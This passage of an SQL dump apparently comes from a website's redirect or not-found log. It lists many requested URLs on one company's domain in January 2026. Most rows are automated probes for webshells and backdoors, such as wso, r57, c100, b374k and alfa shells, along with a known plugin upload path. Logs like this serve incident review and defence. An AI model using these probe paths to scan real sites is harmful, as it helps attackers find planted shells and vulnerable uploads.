00:00:00',301),(55514,'http://3s-technologies.com.tr/tr/assacc.php',NULL,'','',19,0,'2026-01-07 10:17:20','0000-00-00 00:00:00',301),(55515,'http://3s-technologies.com.tr/tr/monso.php',NULL,'','',2,0,'2026-01-07 10:17:21','0000-00-00 00:00:00',301),(55516,'http://3s-technologies.com.tr/tr/bnnof6.php',NULL,'','',2,0,'2026-01-07 10:17:21','0000-00-00 00:00:00',301),(55517,'http://3s-technologies.com.tr/tr/str.php',NULL,'','',2,0,'2026-01-07 10:17:22','0000-00-00 00:00:00',301),(55518,'http://mail.3s-technologies.com.tr/tr/baee.php',NULL,'','',2,0,'2026-01-07 10:22:19','0000-00-00 00:00:00',301),(55519,'http://mail.3s-technologies.com.tr/tr/mga.php',NULL,'','',21,0,'2026-01-07 10:22:21','0000-00-00 00:00:00',301),(55520,'http://mail.3s-technologies.com.tr/tr/rendi59.php',NULL,'','',4,0,'2026-01-07 10:22:21','0000-00-00 00:00:00',301),(55521,'http://mail.3s-technologies.com.tr/tr/bgymj.php',NULL,'','',67,0,'2026-01-07 10:22:22','0000-00-00 00:00:00',301),(55522,'http://mail.3s-technologies.com.tr/tr/assacc.php',NULL,'','',9,0,'2026-01-07 10:22:22','0000-00-00 00:00:00',301),(55523,'http://mail.3s-technologies.com.tr/tr/monso.php',NULL,'','',2,0,'2026-01-07 10:22:23','0000-00-00 00:00:00',301),(55524,'http://mail.3s-technologies.com.tr/tr/bnnof6.php',NULL,'','',2,0,'2026-01-07 10:22:24','0000-00-00 00:00:00',301),(55525,'http://mail.3s-technologies.com.tr/tr/str.php',NULL,'','',2,0,'2026-01-07 10:22:24','0000-00-00 00:00:00',301),(55526,'http://3s-technologies.com.tr/tr/moon3.php',NULL,'','',8,0,'2026-01-07 15:24:47','0000-00-00 00:00:00',301),(55527,'http://3s-technologies.com.tr/tr/ppp.php',NULL,'','',5,0,'2026-01-07 15:25:07','0000-00-00 00:00:00',301),(55528,'http://3s-technologies.com.tr/tr/ov-simple1.php',NULL,'','',50,0,'2026-01-07 15:25:08','0000-00-00 00:00:00',301),(55529,'http://3s-technologies.com.tr/tr/wp-help.php',NULL,'','',1,0,'2026-01-07 15:25:10','0000-00-00 00:00:00',301),(55530,'http://3s-technologies.com.tr/tr/ocxla.php',NULL,'','',4,0,'2026-01-07 15:25:30','0000-00-00 00:00:00',301),(55531,'http://3s-technologies.com.tr/tr/100.kb.php',NULL,'','',12,0,'2026-01-07 15:25:32','0000-00-00 00:00:00',301),(55532,'http://3s-technologies.com.tr/tr/wqqs.php',NULL,'','',13,0,'2026-01-07 15:25:32','0000-00-00 00:00:00',301),(55533,'http://3s-technologies.com.tr/tr/zwq13.php',NULL,'','',16,0,'2026-01-07 15:25:32','0000-00-00 00:00:00',301),(55534,'http://3s-technologies.com.tr/tr/fasx.php',NULL,'','',4,0,'2026-01-07 15:25:35','0000-00-00 00:00:00',301),(55535,'http://3s-technologies.com.tr/en/ws35.php',NULL,'','',1,0,'2026-01-07 15:25:59','0000-00-00 00:00:00',301),(55536,'https://3s-technologies.com.tr/tr/?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image',NULL,'','',12,0,'2026-01-07 20:19:24','0000-00-00 00:00:00',301),(55537,'http://mail.3s-technologies.com.tr/tr/mad.php',NULL,'','',1,0,'2026-01-08 17:34:12','0000-00-00 00:00:00',301),(55538,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/widgets/admin.php',NULL,'','',1,0,'2026-01-08 17:34:14','0000-00-00 00:00:00',301),(55539,'http://mail.3s-technologies.com.tr/tr/anon.php',NULL,'','',1,0,'2026-01-08 17:34:22','0000-00-00 00:00:00',301),(55540,'http://mail.3s-technologies.com.tr/tr/anonymous.php',NULL,'','',1,0,'2026-01-08 17:34:23','0000-00-00 00:00:00',301),(55541,'http://mail.3s-technologies.com.tr/tr/madspotshell.php',NULL,'','',1,0,'2026-01-08 17:34:26','0000-00-00 00:00:00',301),(55542,'http://mail.3s-technologies.com.tr/tr/b374k.php',NULL,'','',1,0,'2026-01-08 17:34:27','0000-00-00 00:00:00',301),(55543,'http://mail.3s-technologies.com.tr/tr/c100.php',NULL,'','',1,0,'2026-01-08 17:34:28','0000-00-00 00:00:00',301),(55544,'http://mail.3s-technologies.com.tr/tr/private.php',NULL,'','',1,0,'2026-01-08 17:34:31','0000-00-00 00:00:00',301),(55545,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/hideo/network.php',NULL,'','',12,0,'2026-01-08 17:34:33','0000-00-00 00:00:00',301),(55546,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/fix/up.php',NULL,'','',1,0,'2026-01-08 17:34:34','0000-00-00 00:00:00',301),(55547,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/upfile.php',NULL,'','',2,0,'2026-01-08 17:34:36','0000-00-00 00:00:00',301),(55548,'http://mail.3s-technologies.com.tr/tr/userfiles/files/u.php7',NULL,'','',1,0,'2026-01-08 17:34:37','0000-00-00 00:00:00',301),(55549,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/yyobang/mar.php',NULL,'','',1,0,'2026-01-08 17:34:41','0000-00-00 00:00:00',301),(55550,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/mar.php',NULL,'','',1,0,'2026-01-08 17:34:44','0000-00-00 00:00:00',301),(55551,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/ango/sett.php',NULL,'','',1,0,'2026-01-08 17:34:46','0000-00-00 00:00:00',301),(55552,'http://mail.3s-technologies.com.tr/tr/cp.php',NULL,'','',1,0,'2026-01-08 17:34:48','0000-00-00 00:00:00',301),(55553,'http://mail.3s-technologies.com.tr/tr/cpbrute.php',NULL,'','',1,0,'2026-01-08 17:34:49','0000-00-00 00:00:00',301),(55554,'http://mail.3s-technologies.com.tr/tr/themes/404/404.php',NULL,'','',1,0,'2026-01-08 17:34:50','0000-00-00 00:00:00',301),(55555,'http://mail.3s-technologies.com.tr/tr/upp.php',NULL,'','',1,0,'2026-01-08 17:34:53','0000-00-00 00:00:00',301),(55556,'http://mail.3s-technologies.com.tr/tr/shellton.php',NULL,'','',2,0,'2026-01-08 17:34:54','0000-00-00 00:00:00',301),(55557,'http://mail.3s-technologies.com.tr/tr/hacked.php',NULL,'','',1,0,'2026-01-08 17:34:57','0000-00-00 00:00:00',301),(55558,'http://mail.3s-technologies.com.tr/tr/r57.php',NULL,'','',9,0,'2026-01-08 17:34:58','0000-00-00 00:00:00',301),(55559,'http://mail.3s-technologies.com.tr/tr/wso24.php',NULL,'','',1,0,'2026-01-08 17:35:00','0000-00-00 00:00:00',301),(55560,'http://mail.3s-technologies.com.tr/tr/wso26.php',NULL,'','',1,0,'2026-01-08 17:35:01','0000-00-00 00:00:00',301),(55561,'http://mail.3s-technologies.com.tr/tr/wso404.php',NULL,'','',1,0,'2026-01-08 17:35:02','0000-00-00 00:00:00',301),(55562,'http://mail.3s-technologies.com.tr/tr/sym.php',NULL,'','',4,0,'2026-01-08 17:35:03','0000-00-00 00:00:00',301),(55563,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/network.php',NULL,'','',10,0,'2026-01-08 17:35:04','0000-00-00 00:00:00',301),(55564,'http://mail.3s-technologies.com.tr/tr/wp-content/upgrade-temp-backup/wp-login.php',NULL,'','',10,0,'2026-01-08 17:35:05','0000-00-00 00:00:00',301),(55565,'http://mail.3s-technologies.com.tr/tr/wordpress/wp-admin/includes/zmfm.php',NULL,'','',4,0,'2026-01-08 17:35:08','0000-00-00 00:00:00',301),(55566,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/seoplugins/index.php',NULL,'','',10,0,'2026-01-08 17:35:13','0000-00-00 00:00:00',301),(55567,'http://mail.3s-technologies.com.tr/tr/libraries/legacy/info.php',NULL,'','',10,0,'2026-01-08 17:35:14','0000-00-00 00:00:00',301),(55568,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/include.php',NULL,'','',10,0,'2026-01-08 17:35:15','0000-00-00 00:00:00',301),(55569,'http://mail.3s-technologies.com.tr/tr/wp-admin/network/about.php',NULL,'','',10,0,'2026-01-08 17:35:16','0000-00-00 00:00:00',301),(55570,'http://mail.3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/rk2.php',NULL,'','',10,0,'2026-01-08 17:35:18','0000-00-00 00:00:00',301),(55571,'http://mail.3s-technologies.com.tr/tr/wordpress/wp-includes/wp-config-sample.php',NULL,'','',10,0,'2026-01-08 17:35:21','0000-00-00 00:00:00',301),(55572,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/tinymce/skins/lightgray/img/about.php',NULL,'','',4,0,'2026-01-08 17:35:24','0000-00-00 00:00:00',301),(55573,'http://mail.3s-technologies.com.tr/tr/wp-includes/block-supports/autoload_classmap.php',NULL,'','',4,0,'2026-01-08 17:35:25','0000-00-00 00:00:00',301),(55574,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/classwithtostring.php',NULL,'','',4,0,'2026-01-08 17:35:25','0000-00-00 00:00:00',301),(55575,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/install.php',NULL,'','',10,0,'2026-01-08 17:35:26','0000-00-00 00:00:00',301),(55576,'http://mail.3s-technologies.com.tr/tr/.well-known/link.php',NULL,'','',10,0,'2026-01-08 17:35:27','0000-00-00 00:00:00',301),(55577,'http://mail.3s-technologies.com.tr/tr/wp-includes/assets/about.php',NULL,'','',7,0,'2026-01-08 17:35:30','0000-00-00 00:00:00',301),(55578,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/ectoplasm/wp-login.php',NULL,'','',7,0,'2026-01-08 17:35:32','0000-00-00 00:00:00',301),(55579,'http://3s-technologies.com.tr/tr/anonymous.php',NULL,'','',1,0,'2026-01-08 18:11:35','0000-00-00 00:00:00',301),(55580,'http://3s-technologies.com.tr/tr/madspotshell.php',NULL,'','',1,0,'2026-01-08 18:11:38','0000-00-00 00:00:00',301),(55581,'http://3s-technologies.com.tr/tr/c100.php',NULL,'','',1,0,'2026-01-08 18:11:39','0000-00-00 00:00:00',301),(55582,'http://3s-technologies.com.tr/tr/userfiles/files/u.php7',NULL,'','',1,0,'2026-01-08 18:11:47','0000-00-00 00:00:00',301),(55583,'http://3s-technologies.com.tr/tr/cpbrute.php',NULL,'','',1,0,'2026-01-08 18:11:57','0000-00-00 00:00:00',301),(55584,'http://3s-technologies.com.tr/tr/themes/404/404.php',NULL,'','',1,0,'2026-01-08 18:11:58','0000-00-00 00:00:00',301),(55585,'http://3s-technologies.com.tr/tr/upp.php',NULL,'','',1,0,'2026-01-08 18:12:00','0000-00-00 00:00:00',301),(55586,'http://3s-technologies.com.tr/tr/shellton.php',NULL,'','',2,0,'2026-01-08 18:12:01','0000-00-00 00:00:00',301),(55587,'http://3s-technologies.com.tr/tr/wso24.php',NULL,'','',1,0,'2026-01-08 18:12:06','0000-00-00 00:00:00',301),(55588,'http://3s-technologies.com.tr/tr/wso26.php',NULL,'','',1,0,'2026-01-08 18:12:07','0000-00-00 00:00:00',301),(55589,'http://3s-technologies.com.tr/tr/wso404.php',NULL,'','',1,0,'2026-01-08 18:12:08','0000-00-00 00:00:00',301),(55590,'http://3s-technologies.com.tr/tr/k8.php',NULL,'','',1,0,'2026-01-08 22:23:46','0000-00-00 00:00:00',301),(55591,'http://3s-technologies.com.tr/tr/secret.php',NULL,'','',1,0,'2026-01-08 22:23:51','0000-00-00 00:00:00',301),(55592,'http://3s-technologies.com.tr/tr/console.php',NULL,'','',1,0,'2026-01-08 22:23:55','0000-00-00 00:00:00',301),(55593,'http://3s-technologies.com.tr/tr/exec.php',NULL,'','',1,0,'2026-01-08 22:23:57','0000-00-00 00:00:00',301),(55594,'http://3s-technologies.com.tr/tr/999.php',NULL,'','',4,0,'2026-01-08 22:24:48','0000-00-00 00:00:00',301),(55595,'http://3s-technologies.com.tr/tr/hack.php',NULL,'','',1,0,'2026-01-08 22:24:51','0000-00-00 00:00:00',301),(55596,'http://3s-technologies.com.tr/tr/rce.php',NULL,'','',1,0,'2026-01-08 22:24:54','0000-00-00 00:00:00',301),(55597,'http://3s-technologies.com.tr/tr/lfi.php',NULL,'','',1,0,'2026-01-08 22:24:55','0000-00-00 00:00:00',301),(55598,'http://3s-technologies.com.tr/tr/rfi.php',NULL,'','',1,0,'2026-01-08 22:24:56','0000-00-00 00:00:00',301),(55599,'http://3s-technologies.com.tr/tr/cmd.exe',NULL,'','',1,0,'2026-01-08 22:24:57','0000-00-00 00:00:00',301),(55600,'http://3s-technologies.com.tr/tr/shell.exe',NULL,'','',2,0,'2026-01-08 22:24:58','0000-00-00 00:00:00',301),(55601,'http://3s-technologies.com.tr/tr/w.exe',NULL,'','',1,0,'2026-01-08 22:24:59','0000-00-00 00:00:00',301),(55602,'http://3s-technologies.com.tr/tr/c.exe',NULL,'','',1,0,'2026-01-08 22:25:00','0000-00-00 00:00:00',301),(55603,'http://3s-technologies.com.tr/tr/inject.php',NULL,'','',2,0,'2026-01-08 22:25:03','0000-00-00 00:00:00',301),(55604,'http://3s-technologies.com.tr/tr/waf.php',NULL,'','',3,0,'2026-01-08 22:25:06','0000-00-00 00:00:00',301),(55605,'http://3s-technologies.com.tr/tr/attack.php',NULL,'','',1,0,'2026-01-08 22:25:07','0000-00-00 00:00:00',301),(55606,'http://3s-technologies.com.tr/tr/pentest.php',NULL,'','',1,0,'2026-01-08 22:25:08','0000-00-00 00:00:00',301),(55607,'http://3s-technologies.com.tr/tr/scan.php',NULL,'','',1,0,'2026-01-08 22:25:10','0000-00-00 00:00:00',301),(55608,'http://3s-technologies.com.tr/tr/ver.php',NULL,'','',4,0,'2026-01-08 22:25:12','0000-00-00 00:00:00',301),(55609,'http://3s-technologies.com.tr/tr/test123.php',NULL,'','',1,0,'2026-01-08 22:25:16','0000-00-00 00:00:00',301),(55610,'http://3s-technologies.com.tr/tr/admin123.php',NULL,'','',1,0,'2026-01-08 22:25:16','0000-00-00 00:00:00',301),(55611,'http://3s-technologies.com.tr/tr/mega.php',NULL,'','',1,0,'2026-01-08 22:25:19','0000-00-00 00:00:00',301),(55612,'http://3s-technologies.com.tr/tr/pro.php',NULL,'','',5,0,'2026-01-08 22:25:21','0000-00-00 00:00:00',301),(55613,'http://3s-technologies.com.tr/tr/advanced.php',NULL,'','',1,0,'2026-01-08 22:25:22','0000-00-00 00:00:00',301),(55614,'http://3s-technologies.com.tr/tr/basic.php',NULL,'','',1,0,'2026-01-08 22:25:25','0000-00-00 00:00:00',301),(55615,'http://3s-technologies.com.tr/tr/smklh.php',NULL,'','',2,0,'2026-01-09 07:09:37','0000-00-00 00:00:00',301),(55616,'http://3s-technologies.com.tr/tr/hlonk.php',NULL,'','',2,0,'2026-01-09 07:09:53','0000-00-00 00:00:00',301),(55617,'http://3s-technologies.com.tr/tr/sagym.php',NULL,'','',2,0,'2026-01-09 07:09:54','0000-00-00 00:00:00',301),(55618,'http://3s-technologies.com.tr/tr/qvaaq.php',NULL,'','',2,0,'2026-01-09 07:09:55','0000-00-00 00:00:00',301),(55619,'http://3s-technologies.com.tr/tr/frg.php',NULL,'','',1,0,'2026-01-09 07:10:00','0000-00-00 00:00:00',301),(55620,'http://3s-technologies.com.tr/tr/to.php',NULL,'','',19,0,'2026-01-09 07:10:02','0000-00-00 00:00:00',301),(55621,'http://3s-technologies.com.tr/tr/nansa.php',NULL,'','',1,0,'2026-01-09 07:10:23','0000-00-00 00:00:00',301),(55622,'http://3s-technologies.com.tr/tr/show.php',NULL,'','',1,0,'2026-01-09 07:10:31','0000-00-00 00:00:00',301),(55623,'http://3s-technologies.com.tr/tr/congab.php',NULL,'','',1,0,'2026-01-09 07:10:38','0000-00-00 00:00:00',301),(55624,'http://3s-technologies.com.tr/tr/xvent.php',NULL,'','',2,0,'2026-01-09 07:10:40','0000-00-00 00:00:00',301),(55625,'http://3s-technologies.com.tr/tr/jatuh.php',NULL,'','',3,0,'2026-01-09 07:10:42','0000-00-00 00:00:00',301),(55626,'http://3s-technologies.com.tr/tr/efsd.php',NULL,'','',1,0,'2026-01-09 07:10:49','0000-00-00 00:00:00',301),(55627,'http://3s-technologies.com.tr/tr/zozla.php',NULL,'','',1,0,'2026-01-09 07:10:58','0000-00-00 00:00:00',301),(55628,'http://3s-technologies.com.tr/tr/lts.php',NULL,'','',4,0,'2026-01-09 07:11:01','0000-00-00 00:00:00',301),(55629,'http://3s-technologies.com.tr/tr/mcd.php',NULL,'','',2,0,'2026-01-09 07:11:05','0000-00-00 00:00:00',301),(55630,'http://3s-technologies.com.tr/tr/wp-gzone.php',NULL,'','',1,0,'2026-01-09 07:11:12','0000-00-00 00:00:00',301),(55631,'http://3s-technologies.com.tr/tr/uuu.php',NULL,'','',63,0,'2026-01-09 07:11:16','0000-00-00 00:00:00',301),(55632,'http://3s-technologies.com.tr/tr/zoz.php',NULL,'','',1,0,'2026-01-09 07:11:36','0000-00-00 00:00:00',301),(55633,'http://3s-technologies.com.tr/tr/yyy.php',NULL,'','',1,0,'2026-01-09 07:11:46','0000-00-00 00:00:00',301),(55634,'http://3s-technologies.com.tr/tr/wp-ana.php',NULL,'','',2,0,'2026-01-09 07:11:48','0000-00-00 00:00:00',301),(55635,'http://3s-technologies.com.tr/tr/horeg.php',NULL,'','',2,0,'2026-01-09 07:12:03','0000-00-00 00:00:00',301),(55636,'http://3s-technologies.com.tr/tr/xcre1.php',NULL,'','',1,0,'2026-01-09 07:12:12','0000-00-00 00:00:00',301),(55637,'http://3s-technologies.com.tr/tr/f-401.php',NULL,'','',1,0,'2026-01-09 07:12:19','0000-00-00 00:00:00',301),(55638,'http://3s-technologies.com.tr/tr/see.php',NULL,'','',1,0,'2026-01-09 07:12:20','0000-00-00 00:00:00',301),(55639,'http://3s-technologies.com.tr/tr/waw.php',NULL,'','',2,0,'2026-01-09 07:12:23','0000-00-00 00:00:00',301),(55640,'http://3s-technologies.com.tr/tr/zafir1.php',NULL,'','',5,0,'2026-01-09 07:12:29','0000-00-00 00:00:00',301),(55641,'http://3s-technologies.com.tr/tr/quoys.php',NULL,'','',1,0,'2026-01-09 07:12:30','0000-00-00 00:00:00',301),(55642,'http://3s-technologies.com.tr/tr/o-simple.php',NULL,'','',2,0,'2026-01-09 07:12:36','0000-00-00 00:00:00',301),(55643,'http://3s-technologies.com.tr/en/mail',NULL,'','',8,0,'2026-01-09 14:31:15','0000-00-00 00:00:00',301),(55644,'http://3s-technologies.com.tr/tr/bitrix/css/main/themes/0x1.php',NULL,'','',5,0,'2026-01-09 14:37:45','0000-00-00 00:00:00',301),(55645,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/wp-conflg.php?p=',NULL,'','',1,0,'2026-01-09 17:14:28','0000-00-00 00:00:00',301),(55646,'http://mail.3s-technologies.com.tr/tr/assets/css/index.php',NULL,'','',26,0,'2026-01-09 17:14:28','0000-00-00 00:00:00',301),(55647,'http://mail.3s-technologies.com.tr/tr/mah/function.php?p=',NULL,'','',3,0,'2026-01-09 17:14:30','0000-00-00 00:00:00',301),(55648,'http://mail.3s-technologies.com.tr/tr/cgi-bin/index.php',NULL,'','',15,0,'2026-01-09 17:14:32','0000-00-00 00:00:00',301),(55649,'http://mail.3s-technologies.com.tr/tr/av.php',NULL,'','',53,0,'2026-01-09 17:14:35','0000-00-00 00:00:00',301),(55650,'http://mail.3s-technologies.com.tr/tr/templates/beez/index.php',NULL,'','',3,0,'2026-01-09 17:14:38','0000-00-00 00:00:00',301),(55651,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/dist',NULL,'','',9,0,'2026-01-09 17:14:43','0000-00-00 00:00:00',301),(55652,'http://mail.3s-technologies.com.tr/tr/wp-content/wp-configs.php',NULL,'','',1,0,'2026-01-09 17:14:53','0000-00-00 00:00:00',301),(55653,'http://mail.3s-technologies.com.tr/tr/wp-l0gin.php',NULL,'','',1,0,'2026-01-09 17:14:56','0000-00-00 00:00:00',301),(55654,'http://mail.3s-technologies.com.tr/tr/wp-includes/id3/admin.php',NULL,'','',1,0,'2026-01-09 17:14:57','0000-00-00 00:00:00',301),(55655,'http://mail.3s-technologies.com.tr/tr/sadd5.php',NULL,'','',2,0,'2026-01-09 17:14:58','0000-00-00 00:00:00',301),(55656,'http://mail.3s-technologies.com.tr/tr/xenium4.php',NULL,'','',3,0,'2026-01-09 17:14:59','0000-00-00 00:00:00',301),(55657,'http://mail.3s-technologies.com.tr/tr/file58.php',NULL,'','',2,0,'2026-01-09 17:15:01','0000-00-00 00:00:00',301),(55658,'http://mail.3s-technologies.com.tr/tr/f5.php',NULL,'','',9,0,'2026-01-09 17:15:02','0000-00-00 00:00:00',301),(55659,'http://mail.3s-technologies.com.tr/tr/s1.php',NULL,'','',11,0,'2026-01-09 17:15:04','0000-00-00 00:00:00',301),(55660,'http://mail.3s-technologies.com.tr/tr/flower2.php',NULL,'','',4,0,'2026-01-09 17:15:06','0000-00-00 00:00:00',301),(55661,'http://mail.3s-technologies.com.tr/tr/xxxx.php',NULL,'','',23,0,'2026-01-09 17:15:08','0000-00-00 00:00:00',301),(55662,'http://mail.3s-technologies.com.tr/tr/ss1.php',NULL,'','',1,0,'2026-01-09 17:15:10','0000-00-00 00:00:00',301),(55663,'http://mail.3s-technologies.com.tr/tr/lyy.php',NULL,'','',1,0,'2026-01-09 17:15:40','0000-00-00 00:00:00',301),(55664,'http://mail.3s-technologies.com.tr/tr/bel.php',NULL,'','',2,0,'2026-01-09 17:15:55','0000-00-00 00:00:00',301),(55665,'http://mail.3s-technologies.com.tr/tr/wp-content/alfa.php',NULL,'','',3,0,'2026-01-09 17:15:56','0000-00-00 00:00:00',301),(55666,'http://mail.3s-technologies.com.tr/tr/admin/resources/dummy/log.php',NULL,'','',1,0,'2026-01-09 17:15:58','0000-00-00 00:00:00',301),(55667,'http://mail.3s-technologies.com.tr/tr/bras.php',NULL,'','',1,0,'2026-01-09 17:16:00','0000-00-00 00:00:00',301),(55668,'http://mail.3s-technologies.com.tr/tr/vv.php',NULL,'','',3,0,'2026-01-09 17:16:02','0000-00-00 00:00:00',301),(55669,'http://mail.3s-technologies.com.tr/tr/xe.php',NULL,'','',1,0,'2026-01-09 17:16:03','0000-00-00 00:00:00',301),(55670,'http://mail.3s-technologies.com.tr/tr/cx.php',NULL,'','',2,0,'2026-01-09 17:16:05','0000-00-00 00:00:00',301),(55671,'http://mail.3s-technologies.com.tr/tr/xrr.php',NULL,'','',1,0,'2026-01-09 17:16:10','0000-00-00 00:00:00',301),(55672,'http://mail.3s-technologies.com.tr/tr/wp-includes/widgets/about.php',NULL,'','',1,0,'2026-01-09 17:16:11','0000-00-00 00:00:00',301),(55673,'http://mail.3s-technologies.com.tr/tr/nov.php',NULL,'','',1,0,'2026-01-09 17:16:13','0000-00-00 00:00:00',301),(55674,'http://mail.3s-technologies.com.tr/tr/wp-content/cache',NULL,'','',2,0,'2026-01-09 17:16:18','0000-00-00 00:00:00',301),(55675,'http://mail.3s-technologies.com.tr/tr/wp-includes/phpmailer',NULL,'','',6,0,'2026-01-09 17:16:20','0000-00-00 00:00:00',301),(55676,'http://mail.3s-technologies.com.tr/tr/wp-includes/blocks/code',NULL,'','',2,0,'2026-01-09 17:16:21','0000-00-00 00:00:00',301),(55677,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/crop',NULL,'','',2,0,'2026-01-09 17:16:22','0000-00-00 00:00:00',301),(55678,'http://mail.3s-technologies.com.tr/tr/wp-includes/rest-api/about.php',NULL,'','',3,0,'2026-01-09 17:16:23','0000-00-00 00:00:00',301),(55679,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/blue',NULL,'','',7,0,'2026-01-09 17:16:24','0000-00-00 00:00:00',301),(55680,'http://mail.3s-technologies.com.tr/tr/da222.php',NULL,'','',1,0,'2026-01-09 17:16:25','0000-00-00 00:00:00',301),(55681,'http://mail.3s-technologies.com.tr/tr/gec.php',NULL,'','',10,0,'2026-01-09 17:16:26','0000-00-00 00:00:00',301),(55682,'http://mail.3s-technologies.com.tr/tr/batmplus.php',NULL,'','',1,0,'2026-01-09 17:16:27','0000-00-00 00:00:00',301),(55683,'http://mail.3s-technologies.com.tr/tr/text.php',NULL,'','',4,0,'2026-01-09 17:16:31','0000-00-00 00:00:00',301),(55684,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/yes.php',NULL,'','',1,0,'2026-01-09 17:16:32','0000-00-00 00:00:00',301),(55685,'http://mail.3s-technologies.com.tr/tr/x',NULL,'','',14,0,'2026-01-09 17:16:33','0000-00-00 00:00:00',301),(55686,'http://3s-technologies.com.tr/tr/wp-sample-load.php',NULL,'','',1,0,'2026-01-09 19:06:39','0000-00-00 00:00:00',301),(55687,'http://3s-technologies.com.tr/tr/wp-header-json.php',NULL,'','',5,0,'2026-01-09 19:06:40','0000-00-00 00:00:00',301),(55688,'http://3s-technologies.com.tr/tr/info.phpquebecoils.com',NULL,'','',1,0,'2026-01-09 19:07:32','0000-00-00 00:00:00',301),(55689,'http://mail.3s-technologies.com.tr/tr/amax.php',NULL,'','',34,0,'2026-01-09 21:08:35','0000-00-00 00:00:00',301),(55690,'http://mail.3s-technologies.com.tr/tr/an8.php',NULL,'','',2,0,'2026-01-09 21:08:37','0000-00-00 00:00:00',301),(55691,'http://mail.3s-technologies.com.tr/tr/moon3.php',NULL,'','',7,0,'2026-01-09 21:08:51','0000-00-00 00:00:00',301),(55692,'http://mail.3s-technologies.com.tr/tr/bless14.php',NULL,'','',2,0,'2026-01-09 21:08:59','0000-00-00 00:00:00',301),(55693,'http://mail.3s-technologies.com.tr/tr/wp-admin/new2.php',NULL,'','',1,0,'2026-01-09 21:09:04','0000-00-00 00:00:00',301),(55694,'http://mail.3s-technologies.com.tr/tr/sitemaps.php',NULL,'','',3,0,'2026-01-09 21:09:08','0000-00-00 00:00:00',301),(55695,'http://mail.3s-technologies.com.tr/tr/css/install.php',NULL,'','',1,0,'2026-01-09 21:09:09','0000-00-00 00:00:00',301),(55696,'http://mail.3s-technologies.com.tr/tr/img.php',NULL,'','',23,0,'2026-01-09 21:09:11','0000-00-00 00:00:00',301),(55697,'http://mail.3s-technologies.com.tr/tr/wp-sign.php',NULL,'','',2,0,'2026-01-09 21:09:16','0000-00-00 00:00:00',301),(55698,'http://mail.3s-technologies.com.tr/tr/ppp.php',NULL,'','',4,0,'2026-01-09 21:09:17','0000-00-00 00:00:00',301),(55699,'http://mail.3s-technologies.com.tr/tr/ov-simple1.php',NULL,'','',31,0,'2026-01-09 21:09:18','0000-00-00 00:00:00',301),(55700,'http://mail.3s-technologies.com.tr/tr/wp-help.php',NULL,'','',1,0,'2026-01-09 21:09:20','0000-00-00 00:00:00',301),(55701,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/wp-trackback.php',NULL,'','',1,0,'2026-01-09 21:09:22','0000-00-00 00:00:00',301),(55702,'http://mail.3s-technologies.com.tr/tr/ooj.php',NULL,'','',2,0,'2026-01-09 21:09:32','0000-00-00 00:00:00',301),(55703,'http://mail.3s-technologies.com.tr/tr/ggfi.php',NULL,'','',1,0,'2026-01-09 21:09:36','0000-00-00 00:00:00',301),(55704,'http://mail.3s-technologies.com.tr/tr/jju.php',NULL,'','',2,0,'2026-01-09 21:09:37','0000-00-00 00:00:00',301),(55705,'http://mail.3s-technologies.com.tr/tr/ocxla.php',NULL,'','',4,0,'2026-01-09 21:09:45','0000-00-00 00:00:00',301),(55706,'http://mail.3s-technologies.com.tr/tr/tt.php',NULL,'','',27,0,'2026-01-09 21:09:46','0000-00-00 00:00:00',301),(55707,'http://mail.3s-technologies.com.tr/tr/100.kb.php',NULL,'','',9,0,'2026-01-09 21:09:47','0000-00-00 00:00:00',301),(55708,'http://mail.3s-technologies.com.tr/tr/wqqs.php',NULL,'','',11,0,'2026-01-09 21:09:47','0000-00-00 00:00:00',301),(55709,'http://mail.3s-technologies.com.tr/tr/zwq13.php',NULL,'','',11,0,'2026-01-09 21:09:48','0000-00-00 00:00:00',301),(55710,'http://mail.3s-technologies.com.tr/tr/clasa99.php',NULL,'','',7,0,'2026-01-09 21:09:51','0000-00-00 00:00:00',301),(55711,'http://mail.3s-technologies.com.tr/tr/fasx.php',NULL,'','',4,0,'2026-01-09 21:09:52','0000-00-00 00:00:00',301),(55712,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/codemirror/info.php',NULL,'','',1,0,'2026-01-09 21:09:54','0000-00-00 00:00:00',301),(55713,'http://mail.3s-technologies.com.tr/en/gastenboek.php',NULL,'','',1,0,'2026-01-09 21:09:55','0000-00-00 00:00:00',301),(55714,'http://mail.3s-technologies.com.tr/en/third_party/kcfinder/upload.php',NULL,'','',1,0,'2026-01-09 21:09:55','0000-00-00 00:00:00',301),(55715,'http://mail.3s-technologies.com.tr/en/lock11.php',NULL,'','',1,0,'2026-01-09 21:09:56','0000-00-00 00:00:00',301),(55716,'http://mail.3s-technologies.com.tr/en/api137.php',NULL,'','',1,0,'2026-01-09 21:09:57','0000-00-00 00:00:00',301),(55717,'http://mail.3s-technologies.com.tr/en/class629.php',NULL,'','',1,0,'2026-01-09 21:09:57','0000-00-00 00:00:00',301),(55718,'http://mail.3s-technologies.com.tr/en/wp670.php',NULL,'','',1,0,'2026-01-09 21:09:58','0000-00-00 00:00:00',301),(55719,'http://mail.3s-technologies.com.tr/en/v1.php',NULL,'','',1,0,'2026-01-09 21:09:58','0000-00-00 00:00:00',301),(55720,'http://mail.3s-technologies.com.tr/en/wp-admin/userk.php',NULL,'','',1,0,'2026-01-09 21:10:00','0000-00-00 00:00:00',301),(55721,'http://mail.3s-technologies.com.tr/en/skinmain.php',NULL,'','',1,0,'2026-01-09 21:10:01','0000-00-00 